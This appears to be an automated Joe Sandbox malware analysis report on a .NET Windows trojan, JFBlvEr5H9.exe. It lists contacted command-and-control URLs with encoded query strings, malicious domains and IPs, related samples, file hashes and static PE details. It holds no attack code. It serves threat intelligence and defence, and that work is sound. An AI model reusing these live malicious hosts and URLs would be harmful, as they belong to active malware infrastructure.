http://www.anewdistraction.com/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf	100%	Avira URL Cloud	malware
http://www.jiyu-kobo.co.jp/4	0%	URL Reputation	safe
http://www.fontbureau.com2	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/)	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sajatypeworks.come	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.aideliveryrobot.com/p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8	0%	Avira URL Cloud	safe
http://www.fontbureau.comue	0%	URL Reputation	safe
http://www.fontbureau.comW.TTF	0%	Avira URL Cloud	safe
http://www.fontbureau.comsivd	0%	Avira URL Cloud	safe
http://www.fontbureau.comda	0%	Avira URL Cloud	safe
http://www.fontbureau.comion	0%	URL Reputation	safe
http://en.wikipedia	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.fontbureau.coma	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/B	0%	URL Reputation	safe
http://www.fontbureau.comd	0%	URL Reputation	safe
http://en.w	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/w	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cnl-nX	0%	Avira URL Cloud	safe
http://www.pyithuhluttaw.net/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=NEaCbUvtdfVyj3ONmrIJ7dR/yfSp7Xbba33MRCbi01	0%	Avira URL Cloud	safe
http://www.fontbureau.comn	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn3	0%	Avira URL Cloud	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/s/0	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnicr	0%	Avira URL Cloud	safe
http://www.fontbureau.comals	0%	URL Reputation	safe
http://www.fontbureau.comalic	0%	URL Reputation	safe
http://www.founder.com.cn/cns-m	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
advancedaccessapplications.com	34.98.99.30	true	true	0%, Virustotal, Browse	unknown
www.pyithuhluttaw.net	103.91.67.83	true	true	1%, Virustotal, Browse	unknown
www.aideliveryrobot.com	52.20.84.62	true	true		unknown
ext-sq.squarespace.com	198.185.159.144	true	false		high
www.anewdistraction.com	unknown	unknown	true		unknown
www.advancedaccessapplications.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.adultpeace.com/p2io/	true	URL Reputation: safe	low
http://www.anewdistraction.com/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf	true	Avira URL Cloud: malware	unknown
http://www.aideliveryrobot.com/p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.sajatypeworks.com2	JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cnX	JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/4	JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com2	JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/)	JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.come	JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	JFBlvEr5H9.exe, 00000000.00000003.240494408.0000000005917000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.fontbureau.comue	JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comW.TTF	JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comsivd	JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comda	JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comion	JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://en.wikipedia	JFBlvEr5H9.exe, 00000000.00000003.237660704.0000000005933000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.coma	JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/B	JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comd	JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://en.w	JFBlvEr5H9.exe, 00000000.00000003.238128917.0000000005916000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/w	JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000003.239881394.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cnl-nX	JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pyithuhluttaw.net/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=NEaCbUvtdfVyj3ONmrIJ7dR/yfSp7Xbba33MRCbi01	mstsc.exe, 00000015.00000002.500275639.0000000000957000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.html	JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comn	JFBlvEr5H9.exe, 00000000.00000003.246881915.000000000591C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn3	JFBlvEr5H9.exe, 00000000.00000003.239956234.0000000005918000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comm	JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/s/0	JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cnicr	JFBlvEr5H9.exe, 00000000.00000003.239956234.0000000005918000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comals	JFBlvEr5H9.exe, 00000000.00000003.245948379.000000000591E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comalic	JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cns-m	JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
52.20.84.62	www.aideliveryrobot.com	United States	14618	AMAZON-AESUS	true
198.185.159.144	ext-sq.squarespace.com	United States	53831	SQUARESPACEUS	false
103.91.67.83	www.pyithuhluttaw.net	Malaysia	55720	GIGABIT-MYGigabitHostingSdnBhdMY	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458762
Start date:	03.08.2021
Start time:	18:11:50
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	JFBlvEr5H9 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/1@6/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 29.7% (good quality ratio 26.6%) Quality average: 72.9% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 80 Number of non-executed functions: 129
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 23.211.6.115, 23.211.4.86, 20.82.210.154, 51.103.5.159, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:12:54	API Interceptor	1x Sleep call for process: JFBlvEr5H9.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
52.20.84.62	ORDER_0009_PDF.exe	Get hash	malicious	Browse	www.microprojects.net/usvr/?UTeX=0nvlV2GPCB&r6=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91jHst47aV7F3
	PO_0008.exe	Get hash	malicious	Browse	www.microprojects.net/usvr/?T4Vtm=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91gn8iZriLesw&mD=3f2XLdWh
	AKG Upgrade Project HP Flare Tip 2018-08311SP-01 R1.exe	Get hash	malicious	Browse	www.deluxeluxe.com/um8e/?D0Dhj=tQxxJThvRlF7uoOgmKtpnJxKPLvD7BbNwQKdj7BVp8iUEZTiqea3Amb+hFcdLgzdK8CzQxtKUQ==&SpK=0RphU8o
	Order210622.exe	Get hash	malicious	Browse	www.brilliantpeople.net/rnn4/?0THhF=qhW2N+OENxuMgY6BQaqBOu4zVUVJPBlL429j4mgTcKLmbUhdjsUCZCU6ULuIPrPPYOxR&8pwDR8=e8n098fX
	PO#8076.exe	Get hash	malicious	Browse	www.trexzin.com/bdIo/?X48Tg=jAEoepUnyJD91hGIbt2H4UvT4GD8W6JahuuTP0mS336S1qZTdyjn+n+zKoIxJBcmVMCk&crht=2dW4nLD0NtvHXLw
	WP7IsjaUga.exe	Get hash	malicious	Browse	www.shopcovetandcrave.com/xkcp/?8pN=meM2OjwkY62wSDZXdg/l66lNbQP+VMltxyXirsNu53DvjKPfmqUuxV1+NEGS4eI+DGZeUAgzkg==&j48=cXRx_BcH
	Import Custom Duty invoice & its clearance documents.exe	Get hash	malicious	Browse	www.shopilyzer.com/hdno/?k6AL=bX2LslV8_8H&5jUh5Lj=vAHjBshrQY90wbP6wYuAGGrsBv3yB0uVhINcxtb/jdclzZG+1EkiLuqYoGnk5rONj/yr
	quote.pdf.exe	Get hash	malicious	Browse	www.pheki.com/owws/?RR=hW6PN3g+bwFsTqYxfcMdFyeWy4Tbl5JsVDeq1KYqt17Exinv6hntH0if2hhU24Mi3HAxD4apXQ==&rVEx8D=S0GhCH
	bin.exe	Get hash	malicious	Browse	www.aideliveryrobot.com/p2io/?uN9hQ=ejlP_vuP4dl4N6&qFQl7Pf8=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ
	Ac5RA9R99F.exe	Get hash	malicious	Browse	www.fydia.com/evpn/?CZa4=U0Pdmtql4+VvPQSQ+Swt/ksTplWHB0r6aeBNER6H7DGyqmGYWZ07p8SdnjAA6A5mLpns&CPWhW=C8eHk
	Calt7BoW2a.exe	Get hash	malicious	Browse	www.fydia.com/evpn/?Dxoxa=ZRmh28X82b&kzrxPDG=U0Pdmtql4+VvPQSQ+Swt/ksTplWHB0r6aeBNER6H7DGyqmGYWZ07p8Sdngg6qRZeROGr
	invoice.exe	Get hash	malicious	Browse	www.widedepot.com/ch65/?uDKD=JuzkL7T4LUnZTQsUlWd3pHkHj4YuC1s7udC2v9/pP6vadqV25YE+uBd9xvjli+Qg28+H&1bd0lZ=gvRpZrK08tSP66
	pVXFB33FzO.exe	Get hash	malicious	Browse	www.thrivezi.com/bw82/?BRAh4F=3XAKDXBTzYl+7eF3IcS+nDMUHIb0m9P0UUgWBFY1xibMAyIvduB5azogqQPpRVdFOyxC&VR-T8=l6AlF0u814LH_Lj

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.pyithuhluttaw.net	oewvlm9yhw.exe	Get hash	malicious	Browse	103.91.67.83
	olG7GnXKKT.exe	Get hash	malicious	Browse	103.91.67.83
	ORDER 200VPS.xlsx	Get hash	malicious	Browse	103.91.67.83
	JUN14 OUTSTANDING CONTRACT ORDER-01.xlsx	Get hash	malicious	Browse	103.91.67.83
	bbZdhGxjJW.exe	Get hash	malicious	Browse	103.91.67.83
	GoRnrfZlAG.exe	Get hash	malicious	Browse	103.91.67.83
	bin.exe	Get hash	malicious	Browse	103.91.67.83
	Contract RFQ01.xlsx	Get hash	malicious	Browse	103.91.67.83
	O64Hou5qAF.exe	Get hash	malicious	Browse	103.91.67.83
	feAfWrgHcX.exe	Get hash	malicious	Browse	103.91.67.83
	6d56768e_by_Libranalysis.exe	Get hash	malicious	Browse	103.91.67.83
	5PthEm83NG.exe	Get hash	malicious	Browse	103.91.67.83
	WGv1KTwWP5.exe	Get hash	malicious	Browse	103.91.67.83
	lFfDzzZYTl.exe	Get hash	malicious	Browse	103.91.67.83
	o52k2obPCG.exe	Get hash	malicious	Browse	103.91.67.83
	q3uHPdoxWP.exe	Get hash	malicious	Browse	103.91.67.83
	NMpDBwHJP8.exe	Get hash	malicious	Browse	103.91.67.83
	1ucvVfbHnD.exe	Get hash	malicious	Browse	103.91.67.83
	pumYguna1i.exe	Get hash	malicious	Browse	103.91.67.83

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-AESUS	6dAzFehHE6.doc	Get hash	malicious	Browse	23.21.136.132
	vcufsCgeP2.doc	Get hash	malicious	Browse	50.16.235.219
	OJYNvmFRjr	Get hash	malicious	Browse	54.208.150.10
	0803_0212424605.doc	Get hash	malicious	Browse	54.225.219.20
	niKcsf1qRy	Get hash	malicious	Browse	54.132.161.17
	uMWZeUs5ZU	Get hash	malicious	Browse	52.207.174.69
	PaymentAdvice.exe	Get hash	malicious	Browse	3.223.115.185
	INV NO-1820000514 USD 270,294.pdf.exe	Get hash	malicious	Browse	198.178.114.55
	Document.exe	Get hash	malicious	Browse	50.16.238.218
	rL3Wx4zKD4.exe	Get hash	malicious	Browse	54.242.144.184
	ORDER_0009_PDF.exe	Get hash	malicious	Browse	52.20.84.62
	Click_me_to_install_SnapTube_tube_apkpure_dl.apk	Get hash	malicious	Browse	3.226.20.171
	bestie.exe	Get hash	malicious	Browse	3.223.115.185
	LnjgWbwSin	Get hash	malicious	Browse	54.62.172.14
	8Z9DxqJIfN	Get hash	malicious	Browse	54.40.250.85
	3etkq3iOPQ	Get hash	malicious	Browse	54.243.89.62
	yuwxgoZIFLndvl.dll	Get hash	malicious	Browse	54.243.175.83
	SKGMC38758347_Aztrade azerbaycan urun teklifi.exe	Get hash	malicious	Browse	35.169.40.107
	SGKCM20217566748_Federighi Turkiye Oferta Term#U00e9k .exe	Get hash	malicious	Browse	35.169.40.107
	PO_0008.exe	Get hash	malicious	Browse	52.20.84.62
SQUARESPACEUS	PO64259,pdf.exe	Get hash	malicious	Browse	198.185.159.144
	PO_0008.exe	Get hash	malicious	Browse	198.185.159.144
	Scan#0068-46c3365.exe	Get hash	malicious	Browse	198.185.159.144
	Payment.exe	Get hash	malicious	Browse	198.185.159.144
	auhToVTQTs.exe	Get hash	malicious	Browse	198.185.159.144
	doc783748934334 PDF.exe	Get hash	malicious	Browse	198.185.159.144
	Order Signed PEARLTECH contract and PO.exe	Get hash	malicious	Browse	198.185.159.144
	TiJdUtcaWz.exe	Get hash	malicious	Browse	198.185.159.144
	n9qwhaMVcs.exe	Get hash	malicious	Browse	198.185.159.144
	E51BZ4gBRo.exe	Get hash	malicious	Browse	198.185.159.144
	Order-CNS Amura Precision Co., Ltd 9A210118KR.exe	Get hash	malicious	Browse	198.185.159.144
	Instruction copy.exe	Get hash	malicious	Browse	198.185.159.144
	00928377320212607_pdf.exe	Get hash	malicious	Browse	198.185.159.144
	2N1tt5eaCn	Get hash	malicious	Browse	142.202.19.59
	MtYE4LZNQy.exe	Get hash	malicious	Browse	198.185.159.144
	wREFu91LXZ.exe	Get hash	malicious	Browse	198.185.159.144
	Orden de compra cotizacion.exe	Get hash	malicious	Browse	198.185.159.144
	Inv_7623980.exe	Get hash	malicious	Browse	198.185.159.144
	Ever Brilliant scan.xlsx	Get hash	malicious	Browse	198.185.159.144
	SMdWrQW0nH.exe	Get hash	malicious	Browse	198.185.159.144

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JFBlvEr5H9.exe.log Download File
Process:	C:\Users\user\Desktop\JFBlvEr5H9.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.015277955515814
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	JFBlvEr5H9.exe
File size:	1336832
MD5:	214b1ddf045e4d6fdd73a5c8788d2adc
SHA1:	8bb7c462fb649d16edb98ab526df8475a329cc71
SHA256:	d8e25ce44c46057985a0467adcf4fc12d8beac599e3031f6674fd1e01988267e
SHA512:	781fff07edcb65ec4c77c80f20a6c6aa658f4679c411654abcdc1233f19cea170b47ebb5a4227618459482f32462af12188a7cb870bd3eb347696485bb530e3c
SSDEEP:	24576:JvvbQF4jajOm9u+d7bs6IpQf4DMqMuulZcjLsq3ut:FbQOmi0Zbwp3DlFu
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.a..............P..p............... ........@.. ....................................@................................

File Icon


Icon Hash:	f0c2a07179b396e8

Static PE Info

General
Entrypoint:	0x508fca
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
